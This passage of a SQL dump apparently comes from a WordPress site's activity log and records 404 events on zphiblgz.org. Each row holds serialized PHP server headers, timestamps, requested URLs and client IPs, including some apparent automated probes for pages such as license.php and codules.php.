AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631738249.993957996368408203125;s:12:\"REQUEST_TIME\";i:1631738249;}}','notice','2021-09-15 20:37:31','2021-09-15 20:37:30',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(97101,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631736633.0390770435333251953125;s:12:\"REQUEST_TIME\";i:1631736633;}}','notice','2021-09-15 20:10:35','2021-09-15 20:10:33',72613520,72695888,'https://zphiblgz.org/license.php',1,0,'185.191.34.215'),(97100,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631732147.709906101226806640625;s:12:\"REQUEST_TIME\";i:1631732147;}}','notice','2021-09-15 18:55:49','2021-09-15 18:55:47',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(97099,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631732144.4132709503173828125;s:12:\"REQUEST_TIME\";i:1631732144;}}','notice','2021-09-15 18:55:46','2021-09-15 18:55:44',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(97098,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631732141.259562969207763671875;s:12:\"REQUEST_TIME\";i:1631732141;}}','notice','2021-09-15 18:55:43','2021-09-15 18:55:41',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(97097,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631732138.1020090579986572265625;s:12:\"REQUEST_TIME\";i:1631732138;}}','notice','2021-09-15 18:55:40','2021-09-15 18:55:38',72649672,72748968,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(97096,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631729493.0966780185699462890625;s:12:\"REQUEST_TIME\";i:1631729493;}}','notice','2021-09-15 18:11:34','2021-09-15 18:11:33',72623584,72707320,'http://zphiblgz.org/scholarship/application/',1,0,'136.243.104.211'),(97095,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"65\\\", \\\"Chromium\\\";v=\\\"65\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631726500.0183179378509521484375;s:12:\"REQUEST_TIME\";i:1631726500;}}','notice','2021-09-15 17:21:42','2021-09-15 17:21:40',72631504,72714600,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97094,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"65\\\", \\\"Chromium\\\";v=\\\"65\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720496.993609905242919921875;s:12:\"REQUEST_TIME\";i:1631720496;}}','notice','2021-09-15 15:41:38','2021-09-15 15:41:37',72631504,72714600,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97093,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720482.7590820789337158203125;s:12:\"REQUEST_TIME\";i:1631720482;}}','notice','2021-09-15 15:41:24','2021-09-15 15:41:22',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(97092,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720479.5745480060577392578125;s:12:\"REQUEST_TIME\";i:1631720479;}}','notice','2021-09-15 15:41:21','2021-09-15 15:41:19',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(97091,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720476.3862750530242919921875;s:12:\"REQUEST_TIME\";i:1631720476;}}','notice','2021-09-15 15:41:18','2021-09-15 15:41:16',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(97090,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720473.2530610561370849609375;s:12:\"REQUEST_TIME\";i:1631720473;}}','notice','2021-09-15 15:41:15','2021-09-15 15:41:13',72649672,72748968,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(97089,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:10:\"PHP/7.3.32\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720248.602261066436767578125;s:12:\"REQUEST_TIME\";i:1631720248;}}','notice','2021-09-15 15:37:30','2021-09-15 15:37:28',72605408,72689144,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97088,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_ORIGIN\";s:19:\"http://zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:15:\"HTTP_USER_AGENT\";s:60:\"PHP/{5|6|7}.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0}\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720245.6114408969879150390625;s:12:\"REQUEST_TIME\";i:1631720245;}}','notice','2021-09-15 15:37:27','2021-09-15 15:37:25',72631672,72715512,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97087,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_ORIGIN\";s:19:\"http://zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"67\\\", \\\"Chromium\\\";v=\\\"67\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631720231.3448240756988525390625;s:12:\"REQUEST_TIME\";i:1631720231;}}','notice','2021-09-15 15:37:13','2021-09-15 15:37:11',72649704,72732800,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97086,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631718786.7335360050201416015625;s:12:\"REQUEST_TIME\";i:1631718786;}}','notice','2021-09-15 15:13:08','2021-09-15 15:13:07',72157512,72241720,'http://zphiblgz.org/category/pauper/',1,0,'207.46.13.142'),(97084,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631708084.132503986358642578125;s:12:\"REQUEST_TIME\";i:1631708084;}}','notice','2021-09-15 12:14:46','2021-09-15 12:14:44',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'92.118.77.10'),(97085,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"35\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631716594.28728199005126953125;s:12:\"REQUEST_TIME\";i:1631716594;}}','notice','2021-09-15 14:36:37','2021-09-15 14:36:34',72646624,72731256,'https://zphiblgz.org/codules.php',1,0,'185.191.34.215'),(97083,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"65\\\", \\\"Chromium\\\";v=\\\"65\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631703920.676906108856201171875;s:12:\"REQUEST_TIME\";i:1631703920;}}','notice','2021-09-15 11:05:22','2021-09-15 11:05:20',72631504,72714600,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97082,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631698462.2319018840789794921875;s:12:\"REQUEST_TIME\";i:1631698462;}}','notice','2021-09-15 09:34:24','2021-09-15 